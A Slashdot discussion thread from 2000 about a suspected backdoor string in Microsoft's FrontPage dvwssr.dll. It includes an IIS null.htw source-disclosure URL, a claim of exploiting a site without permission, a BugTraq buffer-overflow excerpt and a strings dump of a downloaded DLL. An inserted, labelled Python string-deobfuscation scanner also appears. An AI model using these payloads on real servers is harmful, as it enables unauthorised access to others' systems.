  267. Win-lin Situation! by mj++ · · Score: 1
    Microsoft should give up on their Windows server OSes. They should start supporting Linux. Not that they have to change their policies. They can still carry on with their closed-source ways, but now they should employ their entire NT developers on DOS-based Windows. That way they can develop a much better and more powerful desktop PC operating system. Not that Windows 98 isn't great, but then it crashes :( so soon!
    • Windows will never beat Linux in the server OS market.
    • Linux will ever beat Windows on the desktop.
    So here's the deal -
    • Microsoft takes desktop.
    • Linux takes server.
    If that sounds like a typical strategic business deal, well. That's how the world works! Only this time there's no official deal, but an understanding. If only it was for real. (Sigh!)

    --

    --

    --
    mj++

  268. Re:Actual report - not as bad as it looked by Anonymous Coward · · Score: 2
    Hrmmm... Russ Cooper barely acknowledges the true source of this.

    Much better to go have a look at RFP's post to BugTraq.

    One other comment is that M$ products frequently have reports of security holes at least as serious as this, and sometimes a lot more so. I guess this just gets the attention because it was engineered in. But, it is certainly not the only backdoor found in software. Here is a nice one here.

    Parting thought, is anyone going to read this?

  269. Re:haha.. by Anonymous Coward · · Score: 2
    .. more crap ..

    The crap you omitted was "XWebScope Source Retriever". Maybe it is a string which a client needs to send to microsoft's server to be able to retrieve files? Maybe in combination with the Netscape-weenies string?

    I have a feeling that the entire dll is just a tiny "webserver plugin".

    The system functions the dll uses are stuff like strcmp, ReadFile, CloseHandle, strlen and so on. Just enough to check for the secret passphrase and send some files. :-)

  270. Re:So what does the file do then? by Gleef · · Score: 2

    According to one source I read, the only use of the file is for ASP support for Visual Interdev version 1.0. Deleting the file will break Visual Interdev 1.0 support, not in and of itself a big deal, most people have either run away from Microsoft authoring tools, or upgraded to a recent version of FrontPage.

    On the other hand, knowing Microsoft I wouldn't be surprised if the manner in which Visual Interdev support is broken is by the server crashing when a Visual Interdev 1.0 client makes a request for ASP info. This would replace the security hole with a denial of service attack.

    ----

    --

    ----
    Open mind, insert foot.
  271. Re:Don't any of us check these things? by Alex+Belits · · Score: 2

    Don't blame me -- I don't even touch their software, leave alone run it.

    --
    Contrary to the popular belief, there indeed is no God.
  272. I'm astonished at how big of a deal this seems by Chris+Johnson · · Score: 2
    It forces me to look at my assumptions, and this casts some light on the matter. Anyone who has read my essays section at airwindows.com knows I've acutely distrusted Microsoft for _years_, and in fact written things that at the time could have seemed paranoid until Microsoft went and made all of it a reality.

    This is why I am NOT SURPRISED that Microsoft would put in a really _dumb_ and arrogant backdoor key to their software and maintain it through ALL LEVELS of code checking, on purpose- presumably not because they were really actively planning to be able to break into their own customers' computers anytime they wanted, but 'just in case' they might want or need to do that sometime! I fail to see any other possible reason for this. Conceding that they are not the Illuminati or competing with the NSA- the only possible conclusion is that right to the highest levels, Microsoft wanted to leave their options open about someday _becoming_ like that, and so hubris leads them to stick really _stupid_ backdoors in, correctly assuming that their customers would not figure even this out (it's been how many years to figure this one out?)

    The thing is, I am not surprised, so I am startled and astonished when this is suddenly getting so much attention. To me it's just another Bugtraq 'issue' because I already _thought_ Microsoft wanted to supplant the government and lay the groundwork for surveillance and remote control of its own customers. It's old news to me- though this feeling of mine was based on intuition, as I'll happily admit, so there was no real evidence, as I would also admit.

    Now there is- it's a 'smoking gun' type of revelation- and while for me it's an 'Ah, I thought so', for many people it's like waking up and realising their mother is not their mother, like she is a bloodsucking Arcturan weasel in a cheap mask. I can sympathise with their shock to some extent even though I never had much patience with their pathetic trustingness in the first place. Sorry guys. New rules.

  273. Re:If it were open source ... by phil+reed · · Score: 2

    This isn't a flaw - it's deliberate. It's no more a flaw than the flight simulator in Excel 97.


    ...phil

    --

    ...phil
    "For a list of the ways which technology has failed to improve our quality of life, press 3."
  274. Re:Backdoors in "secure software" by davew · · Score: 2

    If you want to create a second way in, man, go ahead. Write a CGI script to exec sshd or something. But you don't need the maintainers of Apache to do that for you; you don't need that capability hidden from you; and you sure as hell don't need that capability being discovered in someone else's system on the other side of the globe and then exploited in yours while you are taking your first holiday in 2 years...

    Backdoors, done properly, have their place. That place is not implemented unknowingly in thousands and thousands of installations worldwide where such a backdoor would be wholly unsuitable anyway.

    Make no mistake. Whatever this is, it's not a feature.

    Dave
    (Still using mozilla 2000041316)

    --

  275. "affects almost every web-hosting provider" by Suydam · · Score: 2

    I'm not trying to downplay the significance of this. But the arrogant statement by whoever (in the Wall St. Journal article) had the gall to imply that this would affect "every web-hosting provider" has forgotten that MOST web-hosting providers aren't dumb enough to use IIS in the first place. Just check the Netcraft Survey of websites to see that Apache, whose developers probably don't think of Netscape engineers as "weenies", holds a 60% (+/- 5% I'm guessing) market share in that area.

    --


    Werd.
  276. Re:Heaven's Gift? -- Nope by dougman · · Score: 2

    you're assuming "corporate" software goes through a lot of QA, or for that matter adequate QA. As someone who has spent years of his life DEEP in the trenches in a software QA role at a "very corporate" software concern, let me assure you that often, the all-important bottom line trumps the QA process. Often.

  277. Re:Heaven's Gift? by sjames · · Score: 2

    I run Linux at home, several co workers do, the head of ops runs it. I have personally seen linux boxes cracked in 3 seconds. Net BSD seems quite possible though.

    Any box that isn't set up properly can be cracked in 3 seconds. Unfortunately, many distros are not set up correctly. NetBSD is a good choice though.

  278. Re:Backdoors in "secure software" by sjames · · Score: 2

    If, for some reason, the ssh daemon dies, I'm fucked.

    If at all possible, I would set the web server up with a serial console to a second system on the site. The second system should also have a relay to trigger the reset line on the server. Nearly all problems that don't require a hardware fix can then be handled remotely.

    There's also the Weasel card that was a story here a while back.

    As far as a backdoor goes, a private one that you put there yourself may be a good thing, but with a global one that many people know how to access, the odds that you'll have to take a trip to the server increase rather than decrease.

  279. Re:Heaven's Gift? by sjames · · Score: 2

    Which one is going to be cheaper in the long run?

    I'd say that Linux/*BSD with Apache is cheaper in the long run. Once set up, Apache is not at all difficult or time intensive to maintain. The same is true of Linux and *BSD. In the real world, I have found that with the same hardware, a Linux system will handle at least 1.5 times the load of an NT system. I don't have much experience with *BSD, but I understand that it will similarly outperform NT.

    The real issue is Frontpage. It is possible to set up Apache with Frontpage, but you are then open to any security flaws it may introduce in its binary-only parts.

    As for justifying the money spent on MS licensing: To put it plainly, I cannot think of a justification for that unless some of your customers insist on an NT based server or on features unique to the MS 'solution'.

  280. No, Apache _not_ affected. by Matts · · Score: 2
    The source code for the MS FrontPage extensions for apache is here:
    http://www.darkorb.net/pub/frontpage/
    See for yourself.
    --

    Matt. Want XML + Apache + Stylesheets? Get AxKit.
  281. Re:Heaven's Gift? -- Nope by Hrunting · · Score: 2

    you're assuming "corporate" software goes through a lot of QA, or for that matter adequate QA.

    I am not assuming this. I specifically stated that people assume this. I have a very good idea how much QA general software goes through, but the mass market does not (since they still believe that the product they get is the final, highest quality version). You can mouth off all you want about how much you know, but the fact that Microsoft sells so much product and that everyone uses it tells people in general that they make a good product that everyone can use, thus when they have a screwup, it raises doubts on all of software in general.

  282. Re:So what does the file do then? by PhilHibbs · · Score: 2

    Are .dll's checksummed? If not, you could just overwrite the "Netscape" message with some gibberish of your own.

  283. Anyone wanna try strings on FrontPage 2000? by jsm · · Score: 2

    This happened in FrontPage 98. Maybe there are some plaintext backdoors in FrontPage 2000. Does anyone with that product wanna run "strings" on a few of the .dll's?

  284. 5.01 128 bit english - doesn't work by Barbarian · · Score: 2

    no text

    --

  285. Associated Press (AP) article on this by Barbarian · · Score: 2

    Here's an associated press article on this:

    http://wire.ap.org/APnews/main.html?FRONTID=TECHNOLOGY&STORYID=APIS73RF7J80

    Sorry to weasel into a reply to the first comment here...


    --

  286. WSJ: Microsoft Acknowledges Security Flaw by Col.+Klink+(retired) · · Score: 2
    My site subscribes to newscast today (today.newscast.com), which is a fee-based news service that collects articles from several sources and gives you a common interface. I searched for "dvwssr.dll" and found only 3 stories, all from the WSJ. The one quoted above, and two copies of another article from April 14, "Microsoft Acknowledges Security Flaw". A couple of fair-use quotes:

    Microsoft Corp. acknowledged yesterday that its engineers included in some of its Internet software a secret password ... that could be used to gain illicit access to hundreds of thousands of Internet sites world-wide.

    The manager of Microsoft's security-response center, Steve Lipner ... described such a backdoor password as "absolutely against our policy" and a firing offense for the as yet unidentified employees.

    ... The company planned to warn customers as soon as possible with an e-mail bulletin and an advisory published on its corporate Web site.

    ... One of the experts who helped identify the file is a professional security consultant known widely among the Internet underground as "Rain Forest Puppy."

    ...

    --

    -- Don't Tase me, bro!

  287. Re:Affects "almost every Web-hosting provider." by clifyt · · Score: 2

    Doesn't anyone fricken read...it says about every Web-Hosting Provider. It doesn't say Web-Server. I run a small ISP and I got a few LinuxBoxes and 1 NT Box. The NT shit is a necessity due to corps requiring it. Who am I to complain about this? I make them sign a waiver in case something like this comes around that says I'm not responsible at all for M$s problems and more secure webservers are available for cheaper hosting within my company (I charge 2x for the M$ stuff and also charge for every bit of permissions I have to change and every ODBC I have to set up...ya know stuff any gimpie could do from the terminal on Apache).

    Learn to read, and don't think just because you have a box set up in the corner you are the average provider...

    clif

  288. Whoops, forgot some by Guru+Meditation · · Score: 2

    Forgot to mention that the above is quoted from TechNet April 2000, Visual InterDev technical notes.

    ----------
    'We have no choice in what we are. Yet what are we,
    but the sum of our choices.' --Rob Grant
    ----------

    --
    'We have no choice in what we are. Yet what are we,
    but the sum of our choices.' --Rob Grant
  289. ironic by jetson123 · · Score: 2

    Isn't it ironic that in an attempt at insulting another software company, MS engineers demonstrate how unprofessional they themselves are?

  290. Re:Actual report - not as bad as it looked by dclydew · · Score: 2

    Nope, I just exploited it on a site that I have no rights on...

    http://www.wiretrip.net/rfp/p/doc.asp?id=45&iface=2

    Try it yourself....

    --
    Get a life, not a lifestyle. - Hikem Bey
  291. See link below -- explanation of the vulnerability by Zico · · Score: 2

    This post (http://slashdot.org/comments.pl?sid=00/04/14/0619206&cid=540) has the information on the vulnerability for those curious to know what the deal is. I shoulda posted it as a reply here to begin with, but am posting this link to it because there probably aren't too many people who will make it down to the 540th post where it got buried. Sorry!

    Cheers,
    ZicoKnows@hotmail.com

  292. Re:Looks like there never was a backdoor (read bel by BeBoxer · · Score: 2
    I don't think it was the Slashdotters who made fools of themselves. Keep in mind that this story was carried on numerous major news sites, including WSJ and C|Net, and included the phrase "Microsoft confirmed" along with other quotes from Microsoft management. I really don't think you can blame people for believing the story when it appears that Microsoft itself believed it to be true. Take this quote from the C|Net article about the bug:

    "This is a vulnerability because it allows an author on one Web site on a shared server to see anything on another server," said Steve Lipner, manager of Microsoft's Security Response Center. "That's the extent of the vulnerability."


    Skepticism is always a healthy thing, but I don't think it's unreasonable to believe that a security hole exists in a Microsoft product when Microsoft says that there is a hole! I mean, do we all have to go install IIS and verify the existence of the hole ourselves to avoid acting "foolish"?

  293. Re:Backdoors in "secure software" as MARKETING by orpheus · · Score: 2
    "Backdoors aren't always a bad thing. Hypothetical situation...

    Say due to some "bug" in the software, you get locked out of your mission critical system...


    Yup, and if your users don't upgrade as quickly as your marketing plan demands (They lose an entire cycle of revenue and a chink of marketing numbers if you skip from v.1 to v.3)...

    and in a couple of years the backdoor might be leaked^h^h^h^h^h^h^h discovered, and many users of your existing products will upgrade. After all, it is the fastest and simplest way to quick-fix this problem (and others that may come later)

    Pretty soon, you'll have them trained: BUY THE NEW VERSION ON RELEASE. True, they may not want to install it yet (until the 'gamma testing' is over -- v2.1 or 2.2), but at least they'll have it on hand when v1.x goes up in smoke.

    In this case, InterDev 1.0 *requires* the affected DLL (so the MS official fix won't work for InterDev users) and a lot of people will move to Frontpage 2000, when FP 98 (or 97) met their needs quite well until now.

    If a licit and deliberate 'front door' password and verification scheme were compromised, MS would clearly be legally liable for failing to protect the password (just as you are liable if you let your corporate password get into the wrong hands) -- but if a "back door" is discovered, then they can blame it on 'evil hackers', even if their own service engineers use it routinely.

    BTW, a legal front door would demand that they do more work -- e.g. verify EngineerID by modem to MS HQ or time-varying encryption -- while a back door can be a simple password, since it is never acknowledged. Any company that deliberately uses a password backdoor is guilty of negligence in today's corporate/legal environment. Do they think no service engineer will ever quit or be fired?.

    __________

    --

    If you can go to bed, knowing you did a valuable thing today, you're very lucky. If you can't... it's not bedtime

  294. It's in more than one dll by stx23 · · Score: 2

    The string also appears in the DLL Mtd2lv.dll, which is installed in C:\Program Files\Common Files\Microsoft Shared\MSDesigners98\. I think it is installed by Visual Studio Enterprise Edition, but this DLL is a lot bigger, namely 514Kb over 7Kb.
    Does anyone know how to exploit it yet, though?

  295. WTF??? by Shoeboy · · Score: 2

    Why didn't they go over to the excel team and learn how to do easter eggs right. Replacing the 404 page with "Netscape blows goats!" would have been cool. This is moronic.
    --Shoeboy

  296. Re:Down right criminal... by Bryan+Andersen · · Score: 2

    Some fast and loose numbers...

    Data from the Netcraft Web Server Survey. Of a total of 13,106,190 servers surveyed about 21% are Microsoft based, or 2,742,931 servers (actual March count). Figuring an average of 2 minutes to login and delete each file at an average pay+overhead rate of $50 an hour for the web admins deleting the .dll you get a cost of about $4,571,552 just to delete the files.

  297. Down right criminal... by Bryan+Andersen · · Score: 2

    The more I think about this the more I feel it is down right criminal to stick a backdoor like this into code. This can lead to massive problems for both individuals and businesses that have data stolen. Look at the trouble that was caused to the credit card companies with the stolen credit card number lists from web servers. Add on top of that the fraudulent charges to people's credit cards. Deliberate backdoors like this and others make it all that much easier for a cracker or script kiddy to break into a system. Who knows if this was the exploit used in any of the previous security breaches. I'd bet that some used it. Maybe not all, but some.

    Ponder this: Would you accept a security system for your house if you knew it could be bypassed by anybody with a standard code?

    1. Re:Down right criminal... by coolgeek · · Score: 2
      about 21% are Microsoft based, or 2,742,931 servers - that's the good news.

      Another interesting info point: with such small marketshare, IIS consistently accounts for 50-70% of reported defacements on attrition.org OS Statistics

      --

      cat /dev/null >sig
    2. Re:Down right criminal... by fsck · · Score: 3

      Or people who run WWW sites could PULL THEIR HEADS OUT OF THEIR ASS and stop using Microsoft Shitware as a server, when there are proven secure solutions that cost 100% less, such as OpenBSD.

      I see stories like this, the NSA scandal, and reading bugtraq, and I just shake my head as to why these people use MS products and smile, feeling all warm and gooshy inside, when they pay enormous amounts of money for something that is proven not to work and is insecure. WTF is going on?

      --

      Lars - ...I could always phone Linus when I had a problem.
  298. And here's the rest by Straker+Skunk · · Score: 2

    For anyone too lazy to even bother . . .

    skunk:~$
    skunk:~$
    skunk:~$ wget http://www.sivertsen.com/_vti_bin/_vti_aut/dvwssr.dll
    --12:06:28-- http://www.sivertsen.com:80/_vti_bin/_vti_aut/dvwssr.dll
    => `dvwssr.dll'
    Connecting to www.sivertsen.com:80... connected!
    HTTP request sent, fetching headers... done.
    Length: 6,416 [text/html]

    0K -> ...... [100%]

    12:06:28 (59.11 KB/s) - `dvwssr.dll' saved [6416/6416]

    skunk:~$ file dvwssr.dll
    dvwssr.dll: MS Windows PE 32-bit Intel 80386 GUI DLL
    skunk:~$ strings dvwssr.dll
    !This program cannot be run in DOS mode.
    .text
    `.rdata
    @.data
    .idata
    .rsrc
    @.reloc
    >%u:
    D$4h
    D$4j
    ]_^[
    t*;5
    D$4j
    D$<"
    DVWSSR.DLL
    DllMain
    GetExtensionVersion
    HttpExtensionProc
    /global.asa
    .asp
    !seineew era sreenigne epacsteN
    HTTP/1.0 404 Object Not Found
    XWebScope Source Retriever
    _refresh_acls_
    Content-type: text/html
    KERNEL32.dll
    lstrcmpiA
    lstrcpynA
    CloseHandle
    ReadFile
    CreateFileA
    lstrlenA
    lstrcpyA
    GetModuleFileNameA
    lstrcmpA
    1!1-141H1O1
    2q2}2
    `0d0
    dvwssr.dbg
    ssr.dll
    skunk:~$

    --
    iSKUNK!
  299. Re:Taking a bomb on a plane by Pope · · Score: 2

    Does Laurie Anderson know you're stealing her material? :)

    Pope

    --
    It doesn't mean much now, it's built for the future.
  300. Backdoors go *way* back. by AJWM · · Score: 2

    Anyone remember Firesign Theatre's "I Think We're All Bozos on this Bus"? Remember the backdoor Clem used - "Springhead, this is worker".

    Heck, I used that same sentence as the backdoor into a system I wrote -- but the customers got source and knew it was there. (Further and more, you had to be already logged in at a certain privilege level before it'd be recognized.)

    There are some occasions where a system needs to provide some way for a "maintenance worker" (or sysadmin) to expose certain inner workings to manipulation -- that's what the root password is all about, right?

    Mind, in this case it doesn't apply: you don't keep such a hook secret from the customer, you do give them the option of changing it (with suitable warnings), and Front Page is hardly anything mission critical enough as to require that sort of access to a running system. (Plenty of other ways to access it if so.)

    Running 'strings' on that DLL (buried deep within the FrontPage directories) did indeed turn up "!seineew era sreenigne epacsteN". I've found other interesting strings in MS software (eg, a copyright notice from the Regents at UCB in 'ftp.exe'). Might be interesting to run strings on all the W2K stuff, although perhaps they're more careful now about hiding such things (maybe they rot13'd it.)

    --
    -- Alastair
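
Added example, not part of the thread: the phrase that `strings` turned up in the comments above is stored reversed, and the last comment wonders about rot13, so a reviewer auditing a binary can decode each extracted string both ways and score the result against a word list. The sample bytes, the small word list and all function names below are constructed for illustration; a real audit would load a full dictionary file.

```python
import codecs
import re

# Constructed stand-in for a real dictionary (e.g. a system word list).
WORDS = frozenset("""
    netscape engineers are weenies secret maintenance password backdoor
    this program cannot run dos mode object not found source retriever
    admin debug access key
""".split())

# Cheap, reversible obfuscations worth undoing during a string review.
TRANSFORMS = {
    "reversed": lambda s: s[::-1],
    "rot13": lambda s: codecs.encode(s, "rot_13"),
    "reversed+rot13": lambda s: codecs.encode(s[::-1], "rot_13"),
}


def extract_strings(data, min_len=4):
    """Return (offset, text) for printable-ASCII runs, like strings(1)."""
    pattern = re.compile(rb"[\x20-\x7e]{%d,}" % min_len)
    return [(m.start(), m.group().decode("ascii")) for m in pattern.finditer(data)]


def word_hits(text):
    """Count dictionary words of three or more letters in text."""
    return sum(1 for w in re.findall(r"[a-z]{3,}", text.lower()) if w in WORDS)


def find_obfuscated(data, min_hits=2):
    """Flag strings that read as words only after a transform is undone."""
    findings = []
    for offset, raw in extract_strings(data):
        plain = word_hits(raw)
        for name, undo in TRANSFORMS.items():
            decoded = undo(raw)
            hits = word_hits(decoded)
            # Require real words, and more of them than the raw form has,
            # so ordinary readable strings are not reported.
            if hits >= min_hits and hits > plain:
                findings.append({"offset": offset, "raw": raw,
                                 "transform": name, "decoded": decoded})
    return findings


# Constructed sample: a few strings quoted in the thread plus one rot13
# string invented here, separated by NUL bytes as in a binary's data section.
SAMPLE = b"\x00".join([
    b"MZ\x90",
    b"!This program cannot be run in DOS mode.",
    b"HttpExtensionProc",
    b"/global.asa",
    b"!seineew era sreenigne epacsteN",
    b"HTTP/1.0 404 Object Not Found",
    b"XWebScope Source Retriever",
    codecs.encode("secret maintenance password", "rot_13").encode("ascii"),
    b"KERNEL32.dll",
])

if __name__ == "__main__":
    for f in find_obfuscated(SAMPLE):
        print(f"0x{f['offset']:04x} {f['transform']:<15} {f['raw']!r} -> {f['decoded']!r}")
```

Strings that are already readable, such as the DOS stub message or the 404 line, are not reported because their raw form scores at least as high as any decoded form.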
  301. Re:Ye gods. by Black+Parrot · · Score: 2

    > OTOH, people here have run strings on the file and it has turned up the phrase... so...?

    Best case it's just a tease and not really a password at all.

    But with MS's recent PR track record, who is going to believe there's not a backdoor even if there isn't? The "NSA key" has been in the news again lately. There's a long flamewar going on in the newsgroups right now.

    This could hardly come at a worse time for Microsoft.

    --

    --
    Sheesh, evil *and* a jerk. -- Jade
  302. Re:Heaven's Gift? -- Nope by SuperKendall · · Score: 2

    You'd think that corporations, seeing the projects within their very own company go through little QA and end up fairly buggy, would run away from anything produced by another corporation.

    But no, time and time again they seek to buy something just because it's produced by another company with a facade of competency (and it's not just Microsoft we are talking about here).

    --
    "There is more worth loving than we have strength to love." - Brian Jay Stanley
  303. Re:Related: A Bug in IIS exposes ASP Source-Code! by SuperKendall · · Score: 2

    There was a space in the URL given - the end should read CiHiliteType=Fill.

    I'll try pasting in the fixed URL:
    http://www.yoursite.com/null.htw?CiWebHitsFile=/yo urfile.asp%20&CiRestriction=none&CiHilit eType=Full

    Nope, /. html munging code strikes again. Oh well, you can fix it by hand.

    --
    "There is more worth loving than we have strength to love." - Brian Jay Stanley
  304. Spelling.... by SuperKendall · · Score: 2

    Sorry, make that:

    There was a space in the URL given - the end should read CiHiliteType=Full

    Not "Fill"!!!

    --
    "There is more worth loving than we have strength to love." - Brian Jay Stanley
  305. Yeah, but... by HarryCaul · · Score: 2



    Ok, sure there's a backdoor in this dll, but what can you do with it? Is it something that can only be accessed from the console? From a webpage somehow? and what rights does the backdoor give you? As funny as I think this is (come on, the fix is "delete the file"?), it remains to be seen just how dangerous the hole really is.

  306. Most persuasive argument for open source by stab · · Score: 2

    No matter what license code comes under, as long as all of the source code is available (even if it's look but don't touch), problems like this will be prevented by simple code auditing and peer review.

    And that's why I'd never trust a piece of Microsoft server software over Apache or Qmail for example. A lot of Microsoft software is relatively stable now (my win2k install hasn't needed rebooting in a month), but so closed and opaque that there's no way whatsoever to audit or confirm that a million backdoors aren't present. One has been found, how many others?!

  307. Interesting - I wonder if there's more. by Frac · · Score: 2
    Anyone care to run checks on more of Microsoft's DLLs? I'm inclined to think that this isn't the only cleartext backdoor in Windows.

    No wonder MS doesn't want DOJ to open-source Windows. It would take them years to clear out all the inside-jokes, bad hacks, broken code, and cleartext backdoors. Yeesh.

  308. My thoughts on what I've seen... by PigleT · · Score: 2

    So `strings d*.dll` produces something you'd find in a dictionary, therefore there's a secret backdoor and all IIS servers are unsafe and if M$loth put the wrong content up on a webserver they could trigger WW3...

    Er. Yeah, right. Next?
    ~Tim
    --
    .|` Clouds cross the black moonlight,

    --
    ~Tim
    --
    .|` Clouds cross the black moonlight,
    Rushing on down to the circle of the turn
  309. You forgot to read the next paragraph by NeoMage · · Score: 2
    The very next part of this reads:

    FrontPage does not change ACLs on content files to manage design-time security; it only changes ACLs on the directories that contain the gatekeeper files admin.dll, author.dll, and dvwssr.dll. FrontPage manipulates content file ACLs to manage run-time security, which is the topic of the next section.

    This file can only be reached and executed if you have -AUTHOR- rights to the web. If you are a smart admin, you would be hosting your sites on NTFS partitions and therefore this is not the big risk that they say it is.

    The 'password' is probably visible in a sniff, or even encoded in the HTTP POST request to the extensions however you CANNOT execute the dll call it without the permissions.

  310. Re:So what does the file do then? by rcw-work · · Score: 2
    Some (VBRUN300.DLL) are, most (SHELL32.DLL, etc) aren't. The checksumming isn't internal to Windows' DLL-loading process, but some DLL's do a checksum of themselves and refuse to run if modified.

    In this case, you could probably make as many changes as you wanted. Just don't change the length of the string unless you're really really good at changing offsets and entry points. :)

  311. Re:haha.. by garver · · Score: 2

    Wow. Thankfully, I didn't find the same in the Linux Frontpage extensions. I looked in both version 3.0 for Frontpage 98 and version 4.0 for Frontpage 2000.

    I can't tell you how much it drives me nuts to have to load Microsoft software on my Linux web servers. So much so that I don't even trust their setuid wrapper. Each site runs as a dummy user, which owns their files.

  312. mod_frontpage w/suexec by / · · Score: 2

    IIRC, it's one of the links off here.

    --
    "If one is really a superior person, the fact is likely to leak out without too much assistance" -- John Andrew Holmes
  313. But WAIT!!!! A buffer overflow... by Gompers · · Score: 2

    Just in from bugtraq....

    From core.lists.bugtraq@CORE-SDI.COM Fri Apr 14 20:23:10 2000
    Date: Fri, 14 Apr 2000 20:40:48 -0300
    From: Gerardo Richarte
    To: BUGTRAQ@SECURITYFOCUS.COM
    Subject: DVWSSR.dll Buffer Overflow Vulnerability in Microsoft IIS 4.0 Web Servers
    Russ wrote (in ntbugtraq):
    > Ok, here's a breaking update.
    >
    > Latest reports say that there is
    >
    > NO VULNERABILITY IN DVWSSR.DLL
    >
    > Yup, that's right, different again from what I said earlier, and even more
    > different than what I said yesterday to WSJ.
    That is not correct.
    We have been playing with dvwssr.dll and we've found a buffer overflow that stops the server from incoming connections, at least.

    -snip-

    We've been playing a little more trying to exploit this buffer overflow, and as we don't
    have InterDevs installed on our IIS, we copied the .dll to /msadc directory, and with
    this configuration, we have been able to make the code jump to our buffer.
    Under these circumstances, the actual BO allows arbitrary code to be executed on the target machine.
    It's interesting to note that no log is generated as an effect of this attack.

    -snip-

    ok folks..this is almost comical...

  314. Re:How is a string backwards a backdoor? by Gompers · · Score: 2

    Apparently Microsoft finds it serious enough to recommend deleting a dll and removing functionality from their product...if it WASN'T a backdoor, do you think they'd do that? After all, they can see the source code and are the only ones that know for sure how their stuff works...or maybe they are just doing it to bely fears...who knows?

  315. Secure CVS by coyote-san · · Score: 2
    we had tight configuration management, in a package a wee-bit more secure than CVS...

    CVS can be made reasonably secure with one simple change: require Kerberos authentication. This has several beneficial effects:

    • CVS *knows* who the user is - there's no worries about old .cvspassword files lying around or being cracked.
    • The user *knows* who the CVS server is - there's no risk of man-in-the-middle attacks.
    • You can encrypt client/server traffic - nobody can modify the data stream en route.
    The CVS server should also be secured, of course, but the combination of the standard Unix permissions and Kerberos telnet and ftp should be adequate to provide a fairly high level of confidence that nobody has modified the underlying RCS files directly.

    --
    For every complex problem there is an answer that is clear, simple, and wrong. -- H L Mencken
  316. Re:Taking a bomb on a plane by MadAhab · · Score: 2
    I dig a really big hole in my garden, maybe the neighbours won't notice that there are lots of little holes all around it?
    Well, this is a technique for getting past censorship. An East German cabaret director told me they called this Weisse Hund, or white dog. They would deliberately put in jokes they knew the censors would reject. Having done his job, the censor would go home, forgetting about the dozen slightly more subtle jokes.

    So the question is, who is looking over their shoulders and why are they trying to preserve backdoors?

    --
    Expanding a vast wasteland since 1996.
  317. Re:WSJ: Full Text Now Free by Cy+Guy · · Score: 2

    Get it from ZDNet.

  318. Re:Not MS policy by Our+Man+In+Redmond · · Score: 2

    For what it's worth, KIRO Radio (Seattle's news/talk station and CBS affiliate) reported this morning that a Microsoft spokesman -- I don't remember which one -- said that this was (paraphrasing) "a very serious breach of company policy" and "those who did it could be fired." Could be? I'll bet they're publicly hung, shot, drawn and quartered, burned at the stake, and bludgeoned to death. And then the real disciplinary action is going to start.
    --

    --
    Someone you trust is one of us.
  319. So we have the password by BorgDrone · · Score: 2

    but how to use it ??

    I'd love to know where to use the pwd, I'll bet lots of lame wannabe sysops 'forget' to delete the file.

    ---

  320. Re: Here's an article from ZDNET by jhittner · · Score: 2

    Here's a new article from ZDNET with some additional details.

  321. Backdoors in "secure software" by Godfree^ · · Score: 2

    Backdoors aren't always a bad thing. Hypothetical situation...

    Say due to some "bug" in the software, you get locked out of your mission critical system. How do you get back in? You phone tech. support and ask for help. 2 possible outcomes: Format and complete reinstall (you only lose the last x hours/days/weeks work), or they send out an engineer with knowledge of a backdoor and allow you access to your system again. Personally, I'd prefer the latter of the 2 options, it's a helluva lot more cost effective in the long term, and helps support of the software.

    The one downfall to this is that people MAY (not necessarily will) discover the backdoor and exploit it, however, if the backdoor is there, chances are there is a way to disable it (as in this case, deleting a dll file). Maybe MS did a good thing here, maybe not. Who's to say?

    --
    - Damnit, I'm dead Jim
    1. Re:Backdoors in "secure software" by Godfree^ · · Score: 2

      The most famous company for having a backdoor is possibly Novell... have you ever heard of burglar.nlm?

      It was developed for use by Novell support engineers to reset the supervisor password in Netware in the event that it was somehow lost (be it a crash in the server, a hack, or forgetfulness). All they needed to do was get to the server console, install the NLM and wehay! No supervisor password.

      However, the NLM got out, and due to bugs in Netware ppl could install the NLM remotely, hack into rconsole and voila! A nice new 0wn3d network...

      After a while, Novell (Apparently) started terminating support contracts on any system that had burglar on it.

      --
      - Damnit, I'm dead Jim
    2. Re:Backdoors in "secure software" by Duxup · · Score: 2

      Although I think it's hard to say if this is indeed a case of the flaw being a back door by design.

      I know of few commercial companies that do not have something of a backdoor (to one extreme or another) designed in their software, or a flaw they find that they do not fix intentionally.

      When working on my own personal systems I hate the idea of such a "backdoor" existing. However, to be honest in the past I have exploited such tricks on other people's systems (or avoided fixing some "backdoors" in other people's systems) to save them time in the future, and it's worked.

      It's one of those things I hate to know is out there, but I have to admit I've used it to my benefit.

    3. Re:Backdoors in "secure software" by Duxup · · Score: 2

      I had not heard of that one.

      It would seem that such backdoors (security flaw, or intentional) were much more common in the past, or at the least more openly spoken of. I've worked with some old IBM, and a few other companies, network and software engineers from "way back in the day" and it seemed as if when they worked on new networks and software in the past that it was almost expected that there would be a backdoor of one sort or another (usually a bug later discovered). Most of them explained that it was used then because the companies who would contract them out, would then hire clueless engineers to run them (sadly seems like today still) who would not know how to manage the systems mainly because they were proprietary and often customized for each company. So eventually they'd probably need to manipulate a bug or designed backdoor to repair damage done to the system by some fool.
      Fortunately, unlike today, that wasn't entirely insecure because most likely only a few companies had the same backdoor and very few people were aware of the bugs or backdoors. Now with nearly everyone using the same software a backdoor seems much more dangerous.

    4. Re:Backdoors in "secure software" by yuggoth · · Score: 2

      Then pray to the gods that the tech support engineer isn't married to an employee of your competitor (or doesn't have a friend who knows somebody who works there etc...:-)

      If you want a backdoor, why don't you ask for it right when the system is installed so you can do it yourself? Do you assume the software company installs backdoors only for the good of its customers?

      If you get locked out of your mission critical system - well, you should have made complete backups on a regular basis, so you can reinstall it in a couple of hours. If you didn't, your business won't get far anyway ...

      If it's really important not to lose a single second of work, mirror your system on different machines using different passwords. If you just can't keep your passwords in memory, place them in a bank safe or somewhere else where they can't fall in the wrong hands.

      --
      Cthulhu fhtagn!
    5. Re:Backdoors in "secure software" by Fishstick · · Score: 2

      You know, I've always wondered the same thing. That makes sense, but why do they leave the "cheat-code" logic in the game and why do the codes always get discovered and made public?

      --

      There is much cruelty in the universe, John.
      Yeah, we seem to have the tour map.

    6. Re:Backdoors in "secure software" by remande · · Score: 3
      Often, a "service entrance" is needed, a way to access your software when you lose your primary access credentials (like, say, you forget the root password). The term "back door" implies a service entrance accessed by knowing a secret that is common across all machines. If we run the same type of system, we have the same back door. This spells doom for truly secure systems, since such secrets get leaked often.

      Secrets get leaked at a rate proportional to both the number of people who know it and the value of the secret. In the MS case, the secret is potentially known by several thousand MS employees with source code access, and the value of the secret is incredible, since it allows access to thousands if not millions of Web servers. In contrast, passwords rarely leak because they are known by only one person and can only be used to attack one site.

